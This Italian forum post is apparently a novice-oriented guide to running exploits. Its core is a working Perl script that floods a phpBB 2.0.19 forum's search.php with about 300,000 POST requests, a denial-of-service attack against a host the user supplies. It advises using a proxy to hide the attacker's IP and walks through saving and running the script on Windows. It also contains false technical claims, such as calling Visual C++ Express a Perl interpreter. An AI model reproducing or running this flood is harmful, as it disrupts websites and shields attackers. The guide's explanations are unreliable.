allora, per prima cosa, se nn avete qualche conoscenza, non provateci nemmeno. Non voglio lamerate o cavoli vari, sono qui sperando di lvorare con persone serie. Vi metto una guida all'utilizzo di exploit, e faremo una prova con il php 2.0.19....
Cosa sono :
Gli Exploit sono parti di codice sorgente di un software qualunque che possono essere usati a proprio piacimento,
nel gergo comune vengono definiti Exploit anche semplici errori di programmazione che la fase di debug non ha rilevato,
la differenza fondamentale tra un Bug ed un "Exploit", così come viene inteso gergalmente,
è che mentre il bug è omnipresente nel software l' Exploit viene attivato da determinate azioni che producono un effetto non previsto dal software stesso.
Come si usano :
Qui di seguito vi spigherò come far funzionare un Exploit sotto sistema operativo Windows dato che suppongo che non tutti usiono Linux.
Allora cominciamo .....
Start >
Esegui>
Ora scrivete cmd.exe e poi date invio ....
Vi uscirà il Prompt dei comandi che si può definire una spece di Shell ...
N.B. Sappiate che maggiorparte di azioni Hacking sono fatte da questo programma che è integrato in Windows.
A questo punto dovete sapere che gli Exploit vengono creati in vari linguaggi di programmazione , i più comuni sono Perl , C e PHP ,
Noi ci soffermeremo nel linguaggio Perl ....
Come si presenta un Exploit in Perl ?
Ve lo mostro subito ....
CODICE
#!/usr/bin/perl
print q{
_________________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
/
,, / /
'-.`()/`.-'
.--_'( )'_--.
/ /` /`""` ` * SpiderZ ForumZ Security *
| | >< | |
/ /
'.__.'
=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Search infinitely exploit
=> Mod: N_T_S
=> Sito: www.spiderz.tk
_________________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
};
use IO::Socket;
$x = 0;
print q(
Exploit phpBB 2.0.19 ( by SpiderZ )
);
print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);
print q(
=> Adesso indica in quale cartella e posto il phpbb
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);
print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);
if($type == 1){
while($x != 0000)
{
$x++;
}
}
elsif ($type == hacking){
while($x != 300000)
{
$postit = "search_keywords=SpiderZ&return_chars=800";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "nConnessione non riuscita: $!n" unless $sock;
print $sock "POST $pth"."search.php?mode=results HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
syswrite STDOUT, ".";
$x++;
}
}else{
die "
Error ! riprova...
n";
}
# www.spiderz.tk [2006]
Ora tutto ciò che dovete fare è andare nel blocco note di Windows , copiate e incollate questo codice ....
Per salvarlo andate su salva con nome , ora vi si presenta la finestra con le seguenti opzioni :
Nome file : e mettete ilnome.pl
Ah,.pl sta a indicare l'estensione del file, poi sotto sta
Salva con nome : voi spuntate su Tutti i file e salvate.
vi ricordo che affinchè Windows riconosca il file dovete scaricarvi un interprete Perl io consiglio Visual C++ Express ed è scaricabile da
http://msdn.microsoft.com/vstudio/express/visualc/ .
Ok ora avete il vostro interprete , il vostro Exploit ed il vostro Prompt dei comandi aperto ,
Tutto quello che dovete fare è trascinare l'Exploit nella finestra del Prompt e date invio ...
Bene non vi resta che seguire le indicazioni dell' Exploit ...
Buon divertimento!
